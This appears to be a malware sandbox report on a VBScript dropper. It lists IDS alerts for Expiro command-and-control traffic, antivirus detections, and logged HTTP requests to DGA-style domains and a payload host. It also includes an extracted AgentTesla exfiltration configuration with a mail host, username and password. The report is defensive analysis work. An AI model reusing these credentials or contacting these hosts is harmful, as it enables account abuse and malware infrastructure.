2024-11-20T10:26:38.794559+0100 | 2037771 | 1 | A Network Trojan was detected | 35.164.78.200 | 80 | 192.168.2.5 | 50023 | TCP
2024-11-20T10:26:43.938547+0100 | 2037771 | 1 | A Network Trojan was detected | 34.211.97.45 | 80 | 192.168.2.5 | 50029 | TCP
2024-11-20T10:27:00.479581+0100 | 2037771 | 1 | A Network Trojan was detected | 3.94.10.34 | 80 | 192.168.2.5 | 50043 | TCP
2024-11-20T10:27:01.876394+0100 | 2037771 | 1 | A Network Trojan was detected | 18.246.231.120 | 80 | 192.168.2.5 | 50044 | TCP

2024-11-20T10:24:48.189753+0100 | 2850851 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49707 | 54.244.188.177 | 80 | TCP
2024-11-20T10:26:02.433224+0100 | 2850851 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50005 | 82.112.184.197 | 80 | TCP


AV Detection

Source: IBKB.vbs | Avira: detected
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Avira: detection malicious, Label: W32/Patched.Ren.Gen
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: esentutl.exe.1560.6.memstrmin | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "s82.gocheapweb.com\"", "Username": "info2@j-fores.com", "Password": "london@1759 "}
Source: IBKB.vbs | ReversingLabs: Detection: 39%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Joe Sandbox ML: detected
Source: C:\Users\Public\Libraries\Juqmtmya.PIF | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\x.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Joe Sandbox ML: detected
Source: unknown | HTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49824 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49900 version: TLS 1.2
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: x.exe, x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2069405714.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2275324060.0000000020AE4000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2169383134.00000000022C6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2275324060.0000000020B20000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2070521735.000000007F920000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: _.pdb source: Native_neworigin.exe, 00000009.00000002.2398990353.0000000003FC5000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000003.2169212695.000000000091E000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2397545638.0000000002A56000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2413068752.0000000005200000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000005.00000003.2139842798.00000000052A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbH source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2145398702.000000002214F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000003.2069405714.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2145398702.0000000022120000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000002.2191785418.0000000002B7F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000002.2275324060.0000000020AE4000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2169383134.00000000022C6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2275324060.0000000020B20000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2070075040.0000000002B79000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000003.2070521735.000000007F920000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdb source: esentutl.exe, 00000005.00000003.2139842798.00000000052A0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DB5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA | 2_2_02DB5908
Source: C:\Users\Public\Libraries\aymtmquJ.pif | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\Public\Libraries\aymtmquJ.pif | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Users\Public\Libraries\aymtmquJ.pif | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Users\Public\Libraries\aymtmquJ.pif | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Users\Public\Libraries\aymtmquJ.pif | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Users\Public\Libraries\aymtmquJ.pif | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\

                      Software Vulnerabilities

                      Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Code function: 4x nop then jmp 01037394h 10_2_01037188
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Code function: 4x nop then jmp 01037CDCh 10_2_01037A88
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 10_2_01037E58
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Code function: 4x nop then jmp 01037CDCh 10_2_01037A7B
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 10_2_01037E56

                      Networking

                      Source: Network traffic | Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.5:49707 -> 54.244.188.177:80
                      Source: Network traffic | Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.5:52499 -> 1.1.1.1:53
                      Source: Network traffic | Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.5:51298 -> 1.1.1.1:53
                      Source: Network traffic | Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.5:50747 -> 1.1.1.1:53
                      Source: Network traffic | Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.5:63540 -> 1.1.1.1:53
                      Source: Network traffic | Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.5:51156 -> 1.1.1.1:53
                      Source: Network traffic | Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.5:60928 -> 1.1.1.1:53
                      Source: Network traffic | Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.5:50005 -> 82.112.184.197:80
                      Source: unknown | DNS traffic detected: English language letter frequency does not match the domain names
                      Source: unknown | Network traffic detected: DNS query count 48
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DCE4B8 InternetCheckConnectionA,2_2_02DCE4B8
                      Source: global traffic | TCP traffic: 192.168.2.5:49771 -> 51.195.88.199:587
                      Source: unknown | DNS query: name: api.ipify.org (logged twice)
                      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 198.252.105.91:443
                      Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.5:49707
                      Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.5:49707
                      Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.5:49708
                      Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.5:49708
                      Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.5:49731
                      Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.5:49731
                      Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.5:50020
                      Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.5:50020
                      Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.5:50018
                      Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.5:50018
                      Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.246.231.120:80 -> 192.168.2.5:50044
                      Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.246.231.120:80 -> 192.168.2.5:50044
                      Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.5:50017
                      Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.5:50017
                      Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.5:50043
                      Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.211.97.45:80 -> 192.168.2.5:50029
                      Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.211.97.45:80 -> 192.168.2.5:50029
                      Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.5:50043
                      Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.5:50011
                      Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.5:50011
                      Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.5:50023
                      Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.5:50023
                      Source: global traffic | TCP traffic: 192.168.2.5:49771 -> 51.195.88.199:587
                      Source: global traffic | HTTP traffic detected: GET /yak2/233_Juqmtmyadyy HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: gxe0.com
                      Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive (3 identical requests)
                      Source: global traffic | HTTP traffic detected: POST /lcoyxsnwq HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /clmhymdikmk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ssbzmoy.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /v HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: cvgrf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /jo HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: npukfztj.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /ksc HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /aunxkp HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /h HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: knjghuig.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /sqxjvguhdtdacidd HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /epmanlipym HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /vfpepibjtu HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /ctaniunjcxta HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ssbzmoy.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /duhfjaeqhlnmwtn HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: cvgrf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /khahgpo HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: npukfztj.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /xyttxtxgf HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /fckn HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /nsnnyu HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: knjghuig.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /cakchsrrlpkav HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /kfhn HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ssbzmoy.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /rb HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: cvgrf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /xkcbxhnrv HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: cvgrf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /dkglfbueemimxh HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: npukfztj.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /krmiyakxt HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /cbhxke HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /mwpi HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: knjghuig.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /pfrxci HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /bqdrapkxlqcka HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /ga HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vjaxhpbji.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /mshka HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vjaxhpbji.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /mvnulpmrxwqe HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: xlfhhhm.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /ueacef HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ifsaia.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /qologlfowpsjwwtq HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: saytjshyf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
                      Source: global traffic | HTTP traffic detected: POST /cr HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vcddkls.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 832
